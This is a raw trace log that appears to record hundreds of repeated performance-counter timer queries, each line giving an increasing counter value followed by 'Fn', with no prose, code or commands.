Get Time type = Performance Ctr, time = 13892119804 True 1
Fn
Get Time type = Performance Ctr, time = 13893124378 True 1
Fn
Get Time type = Performance Ctr, time = 13894276566 True 1
Fn
Get Time type = Performance Ctr, time = 13894808985 True 1
Fn
Get Time type = Performance Ctr, time = 13895405543 True 1
Fn
Get Time type = Performance Ctr, time = 13895994413 True 1
Fn
Get Time type = Performance Ctr, time = 13898313804 True 1
Fn
Get Time type = Performance Ctr, time = 13898849317 True 1
Fn
Get Time type = Performance Ctr, time = 13899403307 True 1
Fn
Get Time type = Performance Ctr, time = 13899933386 True 1
Fn
Get Time type = Performance Ctr, time = 13900446934 True 1
Fn
Get Time type = Performance Ctr, time = 13901382889 True 1
Fn
Get Time type = Performance Ctr, time = 13902384955 True 1
Fn
Get Time type = Performance Ctr, time = 13903842479 True 1
Fn
Get Time type = Performance Ctr, time = 13904457844 True 1
Fn
Get Time type = Performance Ctr, time = 13905467645 True 1
Fn
Get Time type = Performance Ctr, time = 13906683237 True 1
Fn
Get Time type = Performance Ctr, time = 13907340587 True 1
Fn
Get Time type = Performance Ctr, time = 13908074218 True 1
Fn
Get Time type = Performance Ctr, time = 13908761057 True 1
Fn
Get Time type = Performance Ctr, time = 13909525723 True 1
Fn
Get Time type = Performance Ctr, time = 13910255658 True 1
Fn
Get Time type = Performance Ctr, time = 13912318457 True 1
Fn
Get Time type = Performance Ctr, time = 13912856587 True 1
Fn
Get Time type = Performance Ctr, time = 13913442263 True 1
Fn
Get Time type = Performance Ctr, time = 13913961648 True 1
Fn
Get Time type = Performance Ctr, time = 13914496718 True 1
Fn
Get Time type = Performance Ctr, time = 13914803979 True 1
Fn
Get Time type = Performance Ctr, time = 13915147047 True 1
Fn
Get Time type = Performance Ctr, time = 13915477179 True 1
Fn
Get Time type = Performance Ctr, time = 13915840920 True 1
Fn
Get Time type = Performance Ctr, time = 13916140717 True 1
Fn
Get Time type = Performance Ctr, time = 13927875611 True 1
Fn
Get Time type = Performance Ctr, time = 13928124353 True 1
Fn
Get Time type = Performance Ctr, time = 13953934315 True 1
Fn
Get Time type = Performance Ctr, time = 13954125906 True 1
Fn
Get Time type = Performance Ctr, time = 13954626993 True 1
Fn
Get Time type = Performance Ctr, time = 13955020122 True 1
Fn
Get Time type = Performance Ctr, time = 13956920054 True 1
Fn
Get Time type = Performance Ctr, time = 13957147146 True 1
Fn
Get Time type = Performance Ctr, time = 13957616200 True 1
Fn
Get Time type = Performance Ctr, time = 13957856303 True 1
Fn
Get Time type = Performance Ctr, time = 13958627725 True 1
Fn
Get Time type = Performance Ctr, time = 13958915925 True 1
Fn
Get Time type = Performance Ctr, time = 13959465522 True 1
Fn
Get Time type = Performance Ctr, time = 13959752696 True 1
Fn
Get Time type = Performance Ctr, time = 13960292947 True 1
Fn
Get Time type = Performance Ctr, time = 13960453683 True 1
Fn
Get Time type = Performance Ctr, time = 13960982356 True 1
Fn
Get Time type = Performance Ctr, time = 13961293223 True 1
Fn
Get Time type = Performance Ctr, time = 13962723463 True 1
Fn
Get Time type = Performance Ctr, time = 13963078739 True 1
Fn
Get Time type = Performance Ctr, time = 13963782313 True 1
Fn
Get Time type = Performance Ctr, time = 13964067410 True 1
Fn
Get Time type = Performance Ctr, time = 13966107946 True 1
Fn
Get Time type = Performance Ctr, time = 13966422930 True 1
Fn
Get Time type = Performance Ctr, time = 13966966734 True 1
Fn
Get Time type = Performance Ctr, time = 13967223047 True 1
Fn
Get Time type = Performance Ctr, time = 13967706260 True 1
Fn
Get Time type = Performance Ctr, time = 13967927943 True 1
Fn
Get Time type = Performance Ctr, time = 13968548241 True 1
Fn
Get Time type = Performance Ctr, time = 13968714814 True 1
Fn
Get Time type = Performance Ctr, time = 13969070944 True 1
Fn
Get Time type = Performance Ctr, time = 13969308465 True 1
Fn
Get Time type = Performance Ctr, time = 13969806714 True 1
Fn
Get Time type = Performance Ctr, time = 13970226773 True 1
Fn
Get Time type = Performance Ctr, time = 13971831528 True 1
Fn
Get Time type = Performance Ctr, time = 13972110659 True 1
Fn
Get Time type = Performance Ctr, time = 13972638462 True 1
Fn
Get Time type = Performance Ctr, time = 13972933501 True 1
Fn
Get Time type = Performance Ctr, time = 13974674620 True 1
Fn
Get Time type = Performance Ctr, time = 13974852902 True 1
Fn
Get Time type = Performance Ctr, time = 13976225846 True 1
Fn
Get Time type = Performance Ctr, time = 13976477380 True 1
Fn
Get Time type = Performance Ctr, time = 13976920512 True 1
Fn
Get Time type = Performance Ctr, time = 13977193971 True 1
Fn
Get Time type = Performance Ctr, time = 13977704784 True 1
Fn
Get Time type = Performance Ctr, time = 13977979013 True 1
Fn
Get Time type = Performance Ctr, time = 13978467134 True 1
Fn
Get Time type = Performance Ctr, time = 13978661596 True 1
Fn
Get Time type = Performance Ctr, time = 13980099314 True 1
Fn
Get Time type = Performance Ctr, time = 13980293240 True 1
Fn
Get Time type = Performance Ctr, time = 13980725003 True 1
Fn
Get Time type = Performance Ctr, time = 13981088232 True 1
Fn
Get Time type = Performance Ctr, time = 13981598470 True 1
Fn
Get Time type = Performance Ctr, time = 13981902813 True 1
Fn
Get Time type = Performance Ctr, time = 13982492280 True 1
Fn
Get Time type = Performance Ctr, time = 13982626937 True 1
Fn
Get Time type = Performance Ctr, time = 13982993984 True 1
Fn
Get Time type = Performance Ctr, time = 13983209519 True 1
Fn
Get Time type = Performance Ctr, time = 13985794710 True 1
Fn
Get Time type = Performance Ctr, time = 13986075257 True 1
Fn
Get Time type = Performance Ctr, time = 13988916331 True 1
Fn
Get Time type = Performance Ctr, time = 13989118559 True 1
Fn
Get Time type = Performance Ctr, time = 13989551300 True 1
Fn
Get Time type = Performance Ctr, time = 13989788311 True 1
Fn
Get Time type = Performance Ctr, time = 13990337112 True 1
Fn
Get Time type = Performance Ctr, time = 13990647994 True 1
Fn
Get Time type = Performance Ctr, time = 13991190275 True 1
Fn
Get Time type = Performance Ctr, time = 13991404551 True 1
Fn
Get Time type = Performance Ctr, time = 13992076783 True 1
Fn
Get Time type = Performance Ctr, time = 13992270842 True 1
Fn
Get Time type = Performance Ctr, time = 13992696033 True 1
Fn
Get Time type = Performance Ctr, time = 13992995616 True 1
Fn
Get Time type = Performance Ctr, time = 13994573078 True 1
Fn
Get Time type = Performance Ctr, time = 13994768575 True 1
Fn
Get Time type = Performance Ctr, time = 13995191732 True 1
Fn
Get Time type = Performance Ctr, time = 13995341934 True 1
Fn
Get Time type = Performance Ctr, time = 13995689762 True 1
Fn
Get Time type = Performance Ctr, time = 13995972128 True 1
Fn
Get Time type = Performance Ctr, time = 13996455004 True 1
Fn
Get Time type = Performance Ctr, time = 13998669727 True 1
Fn
Get Time type = Performance Ctr, time = 13999191177 True 1
Fn
Get Time type = Performance Ctr, time = 13999321887 True 1
Fn
Get Time type = Performance Ctr, time = 13999959666 True 1
Fn
Get Time type = Performance Ctr, time = 14000206038 True 1
Fn
Get Time type = Performance Ctr, time = 14000821704 True 1
Fn
Get Time type = Performance Ctr, time = 14000977713 True 1
Fn
Get Time type = Performance Ctr, time = 14001503074 True 1
Fn
Get Time type = Performance Ctr, time = 14001751714 True 1
Fn
Get Time type = Performance Ctr, time = 14002298415 True 1
Fn
Get Time type = Performance Ctr, time = 14002596328 True 1
Fn
Get Time type = Performance Ctr, time = 14003965858 True 1
Fn
Get Time type = Performance Ctr, time = 14004090251 True 1
Fn
Get Time type = Performance Ctr, time = 14004407970 True 1
Fn
Get Time type = Performance Ctr, time = 14004544145 True 1
Fn
Get Time type = Performance Ctr, time = 14004876974 True 1
Fn
Get Time type = Performance Ctr, time = 14005070941 True 1
Fn
Get Time type = Performance Ctr, time = 14005478728 True 1
Fn
Get Time type = Performance Ctr, time = 14005638062 True 1
Fn
Get Time type = Performance Ctr, time = 14006744308 True 1
Fn
Get Time type = Performance Ctr, time = 14006915611 True 1
Fn
Get Time type = Performance Ctr, time = 14007282751 True 1
Fn
Get Time type = Performance Ctr, time = 14007483344 True 1
Fn
Get Time type = Performance Ctr, time = 14007848551 True 1
Fn
Get Time type = Performance Ctr, time = 14008042497 True 1
Fn
Get Time type = Performance Ctr, time = 14008441927 True 1
Fn
Get Time type = Performance Ctr, time = 14008562673 True 1
Fn
Get Time type = Performance Ctr, time = 14008866710 True 1
Fn
Get Time type = Performance Ctr, time = 14009165550 True 1
Fn
Get Time type = Performance Ctr, time = 14009654708 True 1
Fn
Get Time type = Performance Ctr, time = 14009773451 True 1
Fn
Get Time type = Performance Ctr, time = 14010063937 True 1
Fn
Get Time type = Performance Ctr, time = 14010291723 True 1
Fn
Get Time type = Performance Ctr, time = 14010743326 True 1
Fn
Get Time type = Performance Ctr, time = 14010952650 True 1
Fn
Get Time type = Performance Ctr, time = 14011487596 True 1
Fn
Get Time type = Performance Ctr, time = 14011647959 True 1
Fn
Get Time type = Performance Ctr, time = 14012030478 True 1
Fn
Get Time type = Performance Ctr, time = 14012219458 True 1
Fn
Get Time type = Performance Ctr, time = 14012626315 True 1
Fn
Get Time type = Performance Ctr, time = 14012842044 True 1
Fn
Get Time type = Performance Ctr, time = 14013234919 True 1
Fn
Get Time type = Performance Ctr, time = 14013487888 True 1
Fn
Get Time type = Performance Ctr, time = 14013997964 True 1
Fn
Get Time type = Performance Ctr, time = 14014278495 True 1
Fn
Get Time type = Performance Ctr, time = 14014743737 True 1
Fn
Get Time type = Performance Ctr, time = 14014974056 True 1
Fn
Get Time type = Performance Ctr, time = 14015401576 True 1
Fn
Get Time type = Performance Ctr, time = 14015610665 True 1
Fn
Get Time type = Performance Ctr, time = 14016038936 True 1
Fn
Get Time type = Performance Ctr, time = 14016187965 True 1
Fn
Get Time type = Performance Ctr, time = 14016732079 True 1
Fn
Get Time type = Performance Ctr, time = 14016997749 True 1
Fn
Get Time type = Performance Ctr, time = 14017461444 True 1
Fn
Get Time type = Performance Ctr, time = 14017656705 True 1
Fn
Get Time type = Performance Ctr, time = 14018076335 True 1
Fn
Get Time type = Performance Ctr, time = 14018329790 True 1
Fn
Get Time type = Performance Ctr, time = 14025057615 True 1
Fn
Get Time type = Performance Ctr, time = 14025207414 True 1
Fn
Get Time type = Performance Ctr, time = 14025586087 True 1
Fn
Get Time type = Performance Ctr, time = 14025928598 True 1
Fn
Get Time type = Performance Ctr, time = 14026722304 True 1
Fn
Get Time type = Performance Ctr, time = 14027015837 True 1
Fn
Get Time type = Performance Ctr, time = 14027586876 True 1
Fn
Get Time type = Performance Ctr, time = 14027925939 True 1
Fn
Get Time type = Performance Ctr, time = 14028762627 True 1
Fn
Get Time type = Performance Ctr, time = 14029078196 True 1
Fn
Get Time type = Performance Ctr, time = 14030537968 True 1
Fn
Get Time type = Performance Ctr, time = 14030809827 True 1
Fn
Get Time type = Performance Ctr, time = 14031359961 True 1
Fn
Get Time type = Performance Ctr, time = 14031543655 True 1
Fn
Get Time type = Performance Ctr, time = 14032050781 True 1
Fn
Get Time type = Performance Ctr, time = 14032270396 True 1
Fn
Get Time type = Performance Ctr, time = 14033738956 True 1
Fn
Get Time type = Performance Ctr, time = 14033960752 True 1
Fn
Get Time type = Performance Ctr, time = 14034518724 True 1
Fn
Get Time type = Performance Ctr, time = 14034711274 True 1
Fn
Get Time type = Performance Ctr, time = 14035344575 True 1
Fn
Get Time type = Performance Ctr, time = 14035554256 True 1
Fn
Get Time type = Performance Ctr, time = 14036884891 True 1
Fn
Get Time type = Performance Ctr, time = 14037220592 True 1
Fn
Get Time type = Performance Ctr, time = 14037726329 True 1
Fn
Get Time type = Performance Ctr, time = 14037899032 True 1
Fn
Get Time type = Performance Ctr, time = 14038421803 True 1
Fn
Get Time type = Performance Ctr, time = 14038834627 True 1
Fn
Get Time type = Performance Ctr, time = 14039410100 True 1
Fn
Get Time type = Performance Ctr, time = 14039609961 True 1
Fn
Get Time type = Performance Ctr, time = 14040046787 True 1
Fn
Get Time type = Performance Ctr, time = 14040291414 True 1
Fn
Get Time type = Performance Ctr, time = 14041860846 True 1
Fn
Get Time type = Performance Ctr, time = 14042088627 True 1
Fn
Get Time type = Performance Ctr, time = 14042552424 True 1
Fn
Get Time type = Performance Ctr, time = 14042677345 True 1
Fn
Get Time type = Performance Ctr, time = 14042999145 True 1
Fn
Get Time type = Performance Ctr, time = 14043276982 True 1
Fn
Get Time type = Performance Ctr, time = 14044713868 True 1
Fn
Get Time type = Performance Ctr, time = 14044883612 True 1
Fn
Get Time type = Performance Ctr, time = 14045630266 True 1
Fn
Get Time type = Performance Ctr, time = 14045935932 True 1
Fn
Get Time type = Performance Ctr, time = 14046633356 True 1
Fn
Get Time type = Performance Ctr, time = 14046775195 True 1
Fn
Get Time type = Performance Ctr, time = 14047113645 True 1
Fn
Get Time type = Performance Ctr, time = 14047381552 True 1
Fn
Get Time type = Performance Ctr, time = 14047873444 True 1
Fn
Get Time type = Performance Ctr, time = 14048172798 True 1
Fn
Get Time type = Performance Ctr, time = 14050132481 True 1
Fn
Get Time type = Performance Ctr, time = 14050426433 True 1
Fn
Get Time type = Performance Ctr, time = 14051054199 True 1
Fn
Get Time type = Performance Ctr, time = 14057219709 True 1
Fn
Get Time type = Performance Ctr, time = 14057558184 True 1
Fn
Get Time type = Performance Ctr, time = 14057687592 True 1
Fn
Get Time type = Performance Ctr, time = 14058206108 True 1
Fn
Get Time type = Performance Ctr, time = 14058519950 True 1
Fn
Get Time type = Performance Ctr, time = 14059117606 True 1
Fn
Get Time type = Performance Ctr, time = 14059390081 True 1
Fn
Get Time type = Performance Ctr, time = 14060854254 True 1
Fn
Get Time type = Performance Ctr, time = 14061155331 True 1
Fn
Get Time type = Performance Ctr, time = 14061726906 True 1
Fn
Get Time type = Performance Ctr, time = 14061914477 True 1
Fn
Get Time type = Performance Ctr, time = 14062335644 True 1
Fn
Get Time type = Performance Ctr, time = 14062603872 True 1
Fn
Get Time type = Performance Ctr, time = 14063112309 True 1
Fn
Get Time type = Performance Ctr, time = 14063269444 True 1
Fn
Get Time type = Performance Ctr, time = 14063635848 True 1
Fn
Get Time type = Performance Ctr, time = 14063849233 True 1
Fn
Get Time type = Performance Ctr, time = 14064361178 True 1
Fn
Get Time type = Performance Ctr, time = 14064643509 True 1
Fn
Get Time type = Performance Ctr, time = 14066125566 True 1
Fn
Get Time type = Performance Ctr, time = 14066264099 True 1
Fn
Get Time type = Performance Ctr, time = 14066602039 True 1
Fn
Get Time type = Performance Ctr, time = 14066912330 True 1
Fn
Get Time type = Performance Ctr, time = 14067456879 True 1
Fn
Get Time type = Performance Ctr, time = 14067749418 True 1
Fn
Get Time type = Performance Ctr, time = 14072054750 True 1
Fn
Get Time type = Performance Ctr, time = 14072335348 True 1
Fn
Get Time type = Performance Ctr, time = 14076582044 True 1
Fn
Get Time type = Performance Ctr, time = 14076878244 True 1
Fn
Get Time type = Performance Ctr, time = 14077173568 True 1
Fn
Get Time type = Performance Ctr, time = 14077434519 True 1
Fn
Get Time type = Performance Ctr, time = 14077778511 True 1
Fn
Get Time type = Performance Ctr, time = 14077941408 True 1
Fn
Get Time type = Performance Ctr, time = 14078215300 True 1
Fn
Get Time type = Performance Ctr, time = 14078466952 True 1
Fn
Get Time type = Performance Ctr, time = 14078898333 True 1
Fn
Get Time type = Performance Ctr, time = 14079126007 True 1
Fn
Get Time type = Performance Ctr, time = 14079432656 True 1
Fn
Get Time type = Performance Ctr, time = 14079705346 True 1
Fn
Get Time type = Performance Ctr, time = 14080107002 True 1
Fn
Get Time type = Performance Ctr, time = 14080289732 True 1
Fn
Get Time type = Performance Ctr, time = 14080563508 True 1
Fn
Get Time type = Performance Ctr, time = 14080747299 True 1
Fn
Get Time type = Performance Ctr, time = 14081363987 True 1
Fn
Get Time type = Performance Ctr, time = 14083057367 True 1
Fn
Get Time type = Performance Ctr, time = 14083724687 True 1
Fn
Get Time type = Performance Ctr, time = 14083881320 True 1
Fn
Get Time type = Performance Ctr, time = 14084173827 True 1
Fn
Get Time type = Performance Ctr, time = 14084324238 True 1
Fn
Get Time type = Performance Ctr, time = 14084692600 True 1
Fn
Get Time type = Performance Ctr, time = 14084963419 True 1
Fn
Get Time type = Performance Ctr, time = 14085279471 True 1
Fn
Get Time type = Performance Ctr, time = 14085406359 True 1
Fn
Get Time type = Performance Ctr, time = 14085677577 True 1
Fn
Get Time type = Performance Ctr, time = 14085971201 True 1
Fn
Get Time type = Performance Ctr, time = 14086303200 True 1
Fn
Get Time type = Performance Ctr, time = 14086468495 True 1
Fn
Get Time type = Performance Ctr, time = 14087882510 True 1
Fn
Get Time type = Performance Ctr, time = 14088166619 True 1
Fn
Get Time type = Performance Ctr, time = 14088483694 True 1
Fn
Get Time type = Performance Ctr, time = 14088691012 True 1
Fn
Get Time type = Performance Ctr, time = 14089177905 True 1
Fn
Get Time type = Performance Ctr, time = 14089389691 True 1
Fn
Get Time type = Performance Ctr, time = 14089741046 True 1
Fn
Get Time type = Performance Ctr, time = 14090086055 True 1
Fn
Get Time type = Performance Ctr, time = 14090448743 True 1
Fn
Get Time type = Performance Ctr, time = 14090615676 True 1
Fn
Get Time type = Performance Ctr, time = 14090914971 True 1
Fn
Get Time type = Performance Ctr, time = 14091154141 True 1
Fn
Get Time type = Performance Ctr, time = 14091504450 True 1
Fn
Get Time type = Performance Ctr, time = 14091627861 True 1
Fn
Get Time type = Performance Ctr, time = 14094796882 True 1
Fn
Get Time type = Performance Ctr, time = 14095184144 True 1
Fn
Get Time type = Performance Ctr, time = 14095510972 True 1
Fn
Get Time type = Performance Ctr, time = 14095721476 True 1
Fn
Get Time type = Performance Ctr, time = 14096012945 True 1
Fn
Get Time type = Performance Ctr, time = 14096158628 True 1
Fn
Get Time type = Performance Ctr, time = 14096477374 True 1
Fn
Get Time type = Performance Ctr, time = 14099785047 True 1
Fn
Get Time type = Performance Ctr, time = 14100811043 True 1
Fn
Get Time type = Performance Ctr, time = 14101021498 True 1
Fn
Get Time type = Performance Ctr, time = 14101340628 True 1
Fn
Get Time type = Performance Ctr, time = 14101595030 True 1
Fn
Get Time type = Performance Ctr, time = 14102009800 True 1
Fn
Get Time type = Performance Ctr, time = 14102162783 True 1
Fn
Get Time type = Performance Ctr, time = 14102433636 True 1
Fn
Get Time type = Performance Ctr, time = 14102582622 True 1
Fn
Get Time type = Performance Ctr, time = 14103602779 True 1
Fn
Get Time type = Performance Ctr, time = 14103774662 True 1
Fn
Get Time type = Performance Ctr, time = 14104056389 True 1
Fn
Get Time type = Performance Ctr, time = 14104301661 True 1
Fn
Get Time type = Performance Ctr, time = 14105429426 True 1
Fn
Get Time type = Performance Ctr, time = 14105649471 True 1
Fn
Get Time type = Performance Ctr, time = 14105933370 True 1
Fn
Get Time type = Performance Ctr, time = 14106153202 True 1
Fn
Get Time type = Performance Ctr, time = 14106524103 True 1
Fn
Get Time type = Performance Ctr, time = 14106833089 True 1
Fn
Get Time type = Performance Ctr, time = 14107185525 True 1
Fn
Get Time type = Performance Ctr, time = 14107502628 True 1
Fn
Get Time type = Performance Ctr, time = 14107832490 True 1
Fn
Get Time type = Performance Ctr, time = 14108163515 True 1
Fn
Get Time type = Performance Ctr, time = 14108475022 True 1
Fn
Get Time type = Performance Ctr, time = 14108672099 True 1
Fn
Get Time type = Performance Ctr, time = 14109905552 True 1
Fn
Get Time type = Performance Ctr, time = 14110958160 True 1
Fn
Get Time type = Performance Ctr, time = 14113573922 True 1
Fn
Get Time type = Performance Ctr, time = 14114163070 True 1
Fn
Get Time type = Performance Ctr, time = 14115354960 True 1
Fn
Get Time type = Performance Ctr, time = 14115590611 True 1
Fn
Get Time type = Performance Ctr, time = 14117327177 True 1
Fn
Get Time type = Performance Ctr, time = 14117566420 True 1
Fn
Get Time type = Performance Ctr, time = 14117917377 True 1
Fn
Get Time type = Performance Ctr, time = 14118138187 True 1
Fn
Get Time type = Performance Ctr, time = 14118444674 True 1
Fn
Get Time type = Performance Ctr, time = 14118673464 True 1
Fn
Get Time type = Performance Ctr, time = 14118967595 True 1
Fn
Get Time type = Performance Ctr, time = 14119221523 True 1
Fn
Get Time type = Performance Ctr, time = 14119539119 True 1
Fn
Get Time type = Performance Ctr, time = 14119894585 True 1
Fn
Get Time type = Performance Ctr, time = 14121161642 True 1
Fn
Get Time type = Performance Ctr, time = 14121405977 True 1
Fn
Get Time type = Performance Ctr, time = 14121737577 True 1
Fn
Get Time type = Performance Ctr, time = 14122033387 True 1
Fn
Get Time type = Performance Ctr, time = 14122493227 True 1
Fn
Get Time type = Performance Ctr, time = 14122739962 True 1
Fn
Get Time type = Performance Ctr, time = 14123916917 True 1
Fn
Get Time type = Performance Ctr, time = 14124044381 True 1
Fn
Get Time type = Performance Ctr, time = 14124298118 True 1
Fn
Get Time type = Performance Ctr, time = 14124595504 True 1
Fn
Get Time type = Performance Ctr, time = 14124931180 True 1
Fn
Get Time type = Performance Ctr, time = 14125237800 True 1
Fn
Get Time type = Performance Ctr, time = 14125567151 True 1
Fn
Get Time type = Performance Ctr, time = 14125776059 True 1
Fn
Get Time type = Performance Ctr, time = 14126053929 True 1
Fn
Get Time type = Performance Ctr, time = 14126402057 True 1
Fn
Get Time type = Performance Ctr, time = 14127971649 True 1
Fn
Get Time type = Performance Ctr, time = 14128106449 True 1
Fn
Get Time type = Performance Ctr, time = 14128358968 True 1
Fn
Get Time type = Performance Ctr, time = 14128473737 True 1
Fn
Get Time type = Performance Ctr, time = 14129422730 True 1
Fn
Get Time type = Performance Ctr, time = 14129623973 True 1
Fn
Get Time type = Performance Ctr, time = 14130185925 True 1
Fn
Get Time type = Performance Ctr, time = 14130455477 True 1
Fn
Get Time type = Performance Ctr, time = 14130805358 True 1
Fn
Get Time type = Performance Ctr, time = 14131034638 True 1
Fn
Get Time type = Performance Ctr, time = 14131331933 True 1
Fn
Get Time type = Performance Ctr, time = 14131619198 True 1
Fn
Get Time type = Performance Ctr, time = 14131945984 True 1
Fn
Get Time type = Performance Ctr, time = 14132138778 True 1
Fn
Get Time type = Performance Ctr, time = 14132729657 True 1
Fn
Get Time type = Performance Ctr, time = 14132859172 True 1
Fn
Get Time type = Performance Ctr, time = 14133110142 True 1
Fn
Get Time type = Performance Ctr, time = 14133401719 True 1
Fn
Get Time type = Performance Ctr, time = 14133727100 True 1
Fn
Get Time type = Performance Ctr, time = 14134005075 True 1
Fn
Get Time type = Performance Ctr, time = 14134322527 True 1
Fn
Get Time type = Performance Ctr, time = 14134558638 True 1
Fn
Get Time type = Performance Ctr, time = 14134932461 True 1
Fn
Get Time type = Performance Ctr, time = 14135097163 True 1
Fn
Get Time type = Performance Ctr, time = 14135844421 True 1
Fn
Get Time type = Performance Ctr, time = 14136066143 True 1
Fn
Get Time type = Performance Ctr, time = 14136467002 True 1
Fn
Get Time type = Performance Ctr, time = 14136769412 True 1
Fn
Get Time type = Performance Ctr, time = 14137101984 True 1
Fn
Get Time type = Performance Ctr, time = 14137291660 True 1
Fn
Get Time type = Performance Ctr, time = 14137789740 True 1
Fn
Get Time type = Performance Ctr, time = 14137960871 True 1
Fn
Get Time type = Performance Ctr, time = 14138255145 True 1
Fn
Get Time type = Performance Ctr, time = 14138538603 True 1
Fn
Get Time type = Performance Ctr, time = 14138862479 True 1
Fn
Get Time type = Performance Ctr, time = 14139097804 True 1
Fn
Get Time type = Performance Ctr, time = 14139408055 True 1
Fn
Get Time type = Performance Ctr, time = 14139635732 True 1
Fn
Get Time type = Performance Ctr, time = 14140040506 True 1
Fn
Get Time type = Performance Ctr, time = 14140340925 True 1
Fn
Get Time type = Performance Ctr, time = 14140794009 True 1
Fn
Get Time type = Performance Ctr, time = 14141015586 True 1
Fn
Get Time type = Performance Ctr, time = 14141327987 True 1
Fn
Get Time type = Performance Ctr, time = 14141453638 True 1
Fn
Get Time type = Performance Ctr, time = 14141703218 True 1
Fn
Get Time type = Performance Ctr, time = 14142017814 True 1
Fn
Get Time type = Performance Ctr, time = 14142328362 True 1
Fn
Get Time type = Performance Ctr, time = 14142485103 True 1
Fn
Get Time type = Performance Ctr, time = 14142744506 True 1
Fn
Get Time type = Performance Ctr, time = 14142927937 True 1
Fn
Get Time type = Performance Ctr, time = 14143195648 True 1
Fn
Get Time type = Performance Ctr, time = 14143457846 True 1
Fn
Get Time type = Performance Ctr, time = 14143795348 True 1
Fn
Get Time type = Performance Ctr, time = 14144069292 True 1
Fn
Get Time type = Performance Ctr, time = 14144617844 True 1
Fn
Get Time type = Performance Ctr, time = 14144869466 True 1
Fn
Get Time type = Performance Ctr, time = 14145239321 True 1
Fn
Get Time type = Performance Ctr, time = 14145371772 True 1
Fn
Get Time type = Performance Ctr, time = 14145637142 True 1
Fn
Get Time type = Performance Ctr, time = 14145911519 True 1
Fn
Get Time type = Performance Ctr, time = 14146225612 True 1
Fn
Get Time type = Performance Ctr, time = 14146516458 True 1
Fn
Get Time type = Performance Ctr, time = 14146862762 True 1
Fn
Get Time type = Performance Ctr, time = 14147131584 True 1
Fn
Get Time type = Performance Ctr, time = 14147447026 True 1
Fn
Get Time type = Performance Ctr, time = 14147575821 True 1
Fn
Get Time type = Performance Ctr, time = 14147816512 True 1
Fn
Get Time type = Performance Ctr, time = 14147964482 True 1
Fn
Get Time type = Performance Ctr, time = 14149578161 True 1
Fn
Get Time type = Performance Ctr, time = 14149876522 True 1
Fn
Get Time type = Performance Ctr, time = 14150179507 True 1
Fn
Get Time type = Performance Ctr, time = 14150428440 True 1
Fn
Get Time type = Performance Ctr, time = 14150734542 True 1
Fn
Get Time type = Performance Ctr, time = 14151026758 True 1
Fn
Get Time type = Performance Ctr, time = 14151366277 True 1
Fn
Get Time type = Performance Ctr, time = 14151571568 True 1
Fn
Get Time type = Performance Ctr, time = 14151872730 True 1
Fn
Get Time type = Performance Ctr, time = 14151982943 True 1
Fn
Get Time type = Performance Ctr, time = 14152214151 True 1
Fn
Get Time type = Performance Ctr, time = 14152368619 True 1
Fn
Get Time type = Performance Ctr, time = 14153982785 True 1
Fn
Get Time type = Performance Ctr, time = 14154093173 True 1
Fn
Get Time type = Performance Ctr, time = 14154452489 True 1
Fn
Get Time type = Performance Ctr, time = 14154753973 True 1
Fn
Get Time type = Performance Ctr, time = 14155090606 True 1
Fn
Get Time type = Performance Ctr, time = 14155397518 True 1
Fn
Get Time type = Performance Ctr, time = 14155664679 True 1
Fn
Get Time type = Performance Ctr, time = 14155876134 True 1
Fn
Get Time type = Performance Ctr, time = 14156154271 True 1
Fn
Get Time type = Performance Ctr, time = 14156428856 True 1
Fn
Get Time type = Performance Ctr, time = 14156730691 True 1
Fn
Get Time type = Performance Ctr, time = 14157012860 True 1
Fn
Get Time type = Performance Ctr, time = 14160377915 True 1
Fn
Get Time type = Performance Ctr, time = 14160546261 True 1
Fn
Get Time type = Performance Ctr, time = 14160782289 True 1
Fn
Get Time type = Performance Ctr, time = 14161067636 True 1
Fn
Get Time type = Performance Ctr, time = 14161380804 True 1
Fn
Get Time type = Performance Ctr, time = 14161615793 True 1
Fn
Get Time type = Performance Ctr, time = 14161902467 True 1
Fn
Get Time type = Performance Ctr, time = 14162074429 True 1
Fn
Get Time type = Performance Ctr, time = 14162388411 True 1
Fn
Get Time type = Performance Ctr, time = 14162730849 True 1
Fn
Get Time type = Performance Ctr, time = 14163005933 True 1
Fn
Get Time type = Performance Ctr, time = 14163338618 True 1
Fn
Get Time type = Performance Ctr, time = 14163775477 True 1
Fn
Get Time type = Performance Ctr, time = 14164087240 True 1
Fn
Get Time type = Performance Ctr, time = 14164364584 True 1
Fn
Get Time type = Performance Ctr, time = 14164517158 True 1
Fn
Get Time type = Performance Ctr, time = 14164745452 True 1
Fn
Get Time type = Performance Ctr, time = 14164917486 True 1
Fn
Get Time type = Performance Ctr, time = 14165185311 True 1
Fn
Get Time type = Performance Ctr, time = 14165393463 True 1
Fn
Get Time type = Performance Ctr, time = 14165669659 True 1
Fn
Get Time type = Performance Ctr, time = 14165890420 True 1
Fn
Get Time type = Performance Ctr, time = 14166167103 True 1
Fn
Get Time type = Performance Ctr, time = 14166336480 True 1
Fn
Get Time type = Performance Ctr, time = 14166566339 True 1
Fn
Get Time type = Performance Ctr, time = 14166881902 True 1
Fn
Get Time type = Performance Ctr, time = 14172790571 True 1
Fn
Get Time type = Performance Ctr, time = 14173067081 True 1
Fn
Get Time type = Performance Ctr, time = 14173385191 True 1
Fn
Get Time type = Performance Ctr, time = 14173552780 True 1
Fn
Get Time type = Performance Ctr, time = 14173852968 True 1
Fn
Get Time type = Performance Ctr, time = 14174044093 True 1
Fn
Get Time type = Performance Ctr, time = 14174319571 True 1
Fn
Get Time type = Performance Ctr, time = 14174553978 True 1
Fn
Get Time type = Performance Ctr, time = 14174876859 True 1
Fn
Get Time type = Performance Ctr, time = 14175088089 True 1
Fn
Get Time type = Performance Ctr, time = 14175512008 True 1
Fn
Get Time type = Performance Ctr, time = 14175746963 True 1
Fn
Get Time type = Performance Ctr, time = 14176049387 True 1
Fn
Get Time type = Performance Ctr, time = 14176346893 True 1
Fn
Get Time type = Performance Ctr, time = 14177140822 True 1
Fn
Get Time type = Performance Ctr, time = 14177374941 True 1
Fn
Get Time type = Performance Ctr, time = 14177771836 True 1
Fn
Get Time type = Performance Ctr, time = 14177923612 True 1
Fn
Get Time type = Performance Ctr, time = 14178169083 True 1
Fn
Get Time type = Performance Ctr, time = 14178430598 True 1
Fn
Get Time type = Performance Ctr, time = 14178736603 True 1
Fn
Get Time type = Performance Ctr, time = 14178963347 True 1
Fn
Get Time type = Performance Ctr, time = 14179242719 True 1
Fn
Get Time type = Performance Ctr, time = 14179539010 True 1
Fn
Get Time type = Performance Ctr, time = 14179844972 True 1
Fn
Get Time type = Performance Ctr, time = 14180109006 True 1
Fn
Get Time type = Performance Ctr, time = 14181778526 True 1
Fn
Get Time type = Performance Ctr, time = 14181907141 True 1
Fn
